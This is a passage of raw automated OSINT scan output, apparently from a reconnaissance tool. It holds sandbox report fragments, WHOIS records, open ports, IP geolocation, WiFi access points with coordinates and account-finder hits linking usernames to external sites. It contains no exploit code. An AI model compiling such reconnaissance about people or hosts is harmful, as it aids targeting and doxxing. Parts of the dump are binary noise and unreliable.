[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00001852]\n "_27D3CBB5-3D28-11ED-9C6D-080027EE4932_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00001828]\n "~DF98AE628D3F4F6A8F.TMP" has type "data"- Location: [%TEMP%\\~DF98AE628D3F4F6A8F.TMP]- [targetUID: 00000000-00001828]\n "RecoveryStore._27D3CBB3-3D28-11ED-9C6D-080027EE4932_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar231B.tmp" has type "data"- Location: [%TEMP%\\Tar231B.tmp]- [targetUID: 00000000-00001852]\n "Cab22FB.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"- Location: [%TEMP%\\Cab22FB.tmp]- [targetUID: 00000000-00001852]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://mitsubachi-rock.jp/manifest.webmanifest"\n Pattern match: "https://mitsubachi-rock.jp"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /manifest.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: mitsubachi-rock.jp\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_35.229.48.116]\n\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 839\nContent-Type: application/octet-stream\nDate: Mon, 26 Sep 2022 01:06:39 GMT\nEtag: "c87b94801c6d7a06efef69815bc78efd-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GDVN9WVW2HFGRY4AJ7M5VFAN\n\n{"icons":[{"src":"icons/icon-48x48.png?v=7ae7a1e080cabd99fd5784f81afc9125","sizes":"48x48","type":"image/png"},{"src":"icons/icon-72x72.png?v=7ae7a1e080cabd99fd5784f81afc9125","sizes":"72x72","type":"image/png"},{"src":"icons/icon-96x96.png?v=7ae7a1e080cabd99fd5784f81afc9125","sizes":"96x96","type":"image/png"},{"src":"icons/icon-144x144.png?v=7ae7a1e080cabd99fd5784f81afc9125","sizes":"144x144","type":"image/png"},{"src":"icons/icon-192x192.png?v=7ae7a1e080cabd99fd5784f81afc9125","sizes":"192x192","type":"image/png"},{"src":"icons/icon-256x256.png?v=7ae7a1e080cabd99fd5784f81afc9125","sizes":"256x256","type":"image/png"},{"src":"icons/icon-384x384.png?v=7ae7a1e080cabd99fd5784f81afc9125","sizes":"384x384","type":"image/png"},{"src":"icons/icon-512x512.png?v=7ae7a1e080cabd99fd5784f81afc9125","sizes":"512x512","type":"im"- [Source: SSL_35.229.48.116]\n, "age/png"}]}"- [Source: SSL_35.229.48.116]\n\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: mitsubachi-rock.jp\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_35.229.48.116]\n\n "HTTP/1.1 404 Not Found\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Encoding: gzip\nContent-Type: text/html; charset=utf-8\nDate: Mon, 26 Sep 2022 01:06:43 GMT\nEtag: 1661701345-ssl-df\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nVary: Accept-Encoding\nX-Nf-Request-Id: 01GDVNA0P9KMD0S1Q7EQGMB3QG\nTransfer-Encoding: chunked"- [Source: SSL_35.229.48.116]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "35.229.48.116": ...\n\n URL: http://www.ootboxnft.com/ (AV positives: 1/88 scanned on 09/26/2022 00:39:30)\n URL: https://zesty-sopapillas-a24dfd.netlify.app/ (AV positives: 9/89 scanned on 09/26/2022 00:28:02)\n URL: http://illustrious | 35.229.48.116 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2077 | 87.248.157.102 |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Trello (Category: social)
https://trello.com/patrickpogoda | patrickpogoda |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | Bootstrap before 4.0.0 is end-of-life and no longer maintained.
Severity: low
Info: https://github.com/twbs/bootstrap/issues/20631 | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.80 | 34.74.170.74 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | zoom (Net ID: 00:01:38:44:83:6D) | 34.0544, -118.244 |
| 2023-05-12 02:54:07 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::ac43:8709:443 | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:45:44 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chantilly', u'security': {u'is_vpn': False}, u'city_geoname_id': 4751935, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'American Registry Internet Numbers', u'organization_name': u'American Registry Internet Numbers', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20151', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:43'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:50c0:8002::153', u'continent': u'North America', u'region_iso_code': u'VA'} | 2606:50c0:8002::153 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Revolut (Category: finance)
https://revolut.me/ayhu | ayhu |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:06:1C:1A) | 52.3759, 4.8975 |
| 2023-05-12 03:00:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.58): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | speedrun (Category: gaming)
https://www.speedrun.com/user/login/ | login |
| 2023-05-12 03:03:41 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 010pixel.github.io |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | scoop.sh | 185.199.109.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Elijah Sadee (Net ID: 00:1D:D3:6D:1D:D0) | 32.8608, -79.9746 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo1 (Net ID: 00:02:6F:D8:57:09) | 50.8897, 6.0563 |
| 2023-05-12 03:33:38 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | cHRM
IDATx
9RD@R
6_:f
Q3ot<@
:_w$`i
8vw8uLk
iZpj
bI@kd
IDAT>
!H?RZ
Rz`8<
e RmZ
!heNN
ZZ@"U
P>HZD
xq5E
H!wqlM
qkR`
Z9wq-'C
ghdf9egC
O' :F`
Q16Oh.
i$sb$
iJpj0
Ir``:
@OIFR
"U04wI0
>/w`E
jp8YJ
jvvm:Z1
!lwc4i
| https://pics.battleb0t.xyz/images/favicon.png |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 200 | https://battleb0t.xyz/main.built.js |
| 2023-05-12 02:45:58 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Frankfurt am Main', u'security': {u'is_vpn': False}, u'city_geoname_id': 2925533, u'region_geoname_id': 2905330, u'country': u'Germany', u'region': u'Hesse', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'DIGITALOCEAN-ASN', u'isp_name': u'DigitalOcean', u'organization_name': u'DigitalOcean, LLC', u'autonomous_system_number': 14061}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/DE_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/DE_flag.png', u'unicode': u'U+1F1E9 U+1F1EA', u'emoji': u'\U0001f1e9\U0001f1ea'}, u'postal_code': u'60313', u'longitude': 8.6843, u'country_code': u'DE', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Berlin', u'current_time': u'04:45:57'}, u'latitude': 50.1188, u'country_geoname_id': 2921044, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'64.226.81.43', u'continent': u'Europe', u'region_iso_code': u'HE'} | 64.226.81.43 |
| 2023-05-12 02:46:49 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | 104.196.30.220 |
| 2023-05-12 02:44:20 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.110.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1620 Guest (Net ID: 00:01:21:30:37:50) | 52.3759, 4.8975 |
| 2023-05-12 03:41:52 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60306, Germany, Europe | 45.131.109.53 |
| 2023-05-12 03:00:55 | Co-Hosted Site | No | HackerTarget | 3 | 0 | 2 | 0 | None | 00ffcc.cn | 185.199.111.153 |
| 2023-05-12 02:44:28 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | netlify.app | frabjous-lebkuchen-324004.netlify.app |
| 2023-05-12 02:54:44 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 396982 | 35.229.48.116 |
| 2023-05-12 02:55:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://bouncefitness.precisiongroup.com.au/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_344_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_344_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_344_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_344_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_836"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_344_IE_EarlyTabStart_0xbac_Mutex"\n "IsoScope_344_ConnHashTable<836>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_836"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.166:80"\n "104.21.6.166:443"\n "142.250.189.202:443"\n "172.217.12.104:443"\n "172.217.164.99:443"\n "142.251.46.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bouncefitness.precisiongroup.com.au"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bouncefitness.precisiongroup.com.au"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2016 Twitter, Inc." (Indicator: "twitter")\n "<a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-repeater-item-37c2364" target="_blank">" (Indicator: "twitter")\n "<i class="fab fa-twitter"></i></a>" (Indicator: "twitter")\n "<noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript>" (Indicator: "youtube")\n "<span class="elementor-screen-only">Twitter</span>" (Indicator: "twitter")\n "function Ey(a,b){var c=this;return b}Ey.O="internal.enableAutoEventOnScroll";var cc=fa(["data-gtm-yt-inspected-"]),Fy=["www.youtube.com","www.youtube-nocookie.com"],Gy,Hy=!1;" (Indicator: "youtube")\n "function Ry(a,b){var c=this;return b}Ry.O="internal.enableAutoEventOnYouTubeActivity";var Sy;function Ty(a){var b=!1;return b}Ty.O="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "transportUrl:b,context:c},Q(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Qh.ka+"&cx=c";cs()&&(f+="&sign="+Qh.ue);var g=fi||hi?bs(b,f):void 0;g||(g=Po("https://","http://",Qh.Jd+f));Rl().destination[a]={state:1,context:c};mc(g)}};function ds(){if(vl()){return!0}return!1};var gs=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),hs={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},is={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc-_1_.woff" has type "Web Open Font Format TrueType length 20544 version 1.1"- [targetUID: N/A]\n "~DFAE12B4DD5D9EF57E.TMP" has type "data"- Location: [%TEMP%\\~DFAE12B4DD5D9EF57E.TMP]- [targetUID: 00000000-00000836]\n "lazyload.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "548YBEKT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\548YBEKT.txt]- [targetUID: 00000000-00002848]\n "solid.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "P8ST09HS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P8ST09HS.txt]- [targetUID: 00000000-00000836]\n "style.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "preloaded-elements-handlers.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "webpack.runtime.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "frontend-modules.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_17DA973C-BEDC-11ED-8783-080027090D53_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "animations.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "waypoints.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "post-1477_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "wp-polyfill.min_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "bounce_logo_2_.png" has type "PNG image data 264 x 130 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "swiper.min_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "flexslider_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\ufffd\ufffd3>q\ufffd\ufffd[>\ufffd\ufffdd\ufffd*CgY\ufffdI\u043b\ufffd\xb9*\ufffdS\ufffdS\ufffd=\ufffd:\ufffdw\ufffdb/~\ufffd\ufffd\ufffd\ufffd?<<\ufffd{\ufffdT \ufffd\ufffdM\ufffdZ0\ufffd\ufffd\ufffdF\ufffd,\ufffdU\ufffd]\ufffd\ufffdtll\ufffdM\ufffd\ufffd[\ufffd\ufffd\u06be\ufffd\ufffd\ufffddz\ufffd\ufffd;\ufffd7\ufffd\ufffdN\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffdn#\ufffd\ufffdN>@)mN\ufffd?>\ufffd\ufffd\ufffd\u0785R\ufffd\ufffd`\uac7e\ufffdQ\ufffd$z/\ufffd2\ufffd\ufffdx\ufffdM\ufffdG\ufffdk\ufffdf6Ip\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdg\ufffd\ufffdnX4d\ufffd\ufffd\ufffde.0.\ufffd\ufffd\ufffd!/\ufffd\ufffd\ufffd\ufffd^\ufffd=z\ufffd5\ufffd\ufffd\ufffd\ufffd\'\ufffdhCh\ufffd7\ufffd\u0290\ufffd\ufffd\ufffd\ufffdj\ufffd:\u0760\ufffd\u059eUP?\ufffd\ufffdU\ufffdH+h\ueb420\ufffd\ufffd\ufffd\ufffd\ufffd[\ufffdh\ufffd3D\ufffd\ufffd*\ufffdS\ufffdzWAD7!\ufffd>\ufffdd\ufffdBhm\ufffd{fK\ufffdz\ufffd\ufffd"\n Pattern match: "T.HZ/1\ufffd\ufffd\ufffd\ufffd\ufffdb\u02ca\ufffd1"\n Pattern match: "https://twitter.com/intent/tweet?text={text"\n Pattern match: "https://+a+.google-analytics.com/g/collect},IA=function(){var"\n Pattern match: "http://www.w3.org/2000/svg,svg"\n Pattern match: "https://cct.google/taggy/agent.js"\n Pattern match: "http://getbootstrap.com"\n Pattern match: "https://fontawesome.com"\n Pattern match: "http://api.jqueryui.com/position/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://jqueryui.com"\n Pattern match: "http://swiperjs.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "https://github.com/twbs/bootstrap/blob/master/LICENSE"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "http://jqueryui.com*"\n Pattern match: "github.com/necolas/normalize.css"\n Pattern match: "https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css"\n Pattern match: "https://wp-rocket.me"\n Pattern match: "https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto%20Slab%3A100%2C100italic%2C200%2C200it"\n Pattern match: "https://bouncefitness.precisiongroup.com.au/"\n Pattern match: 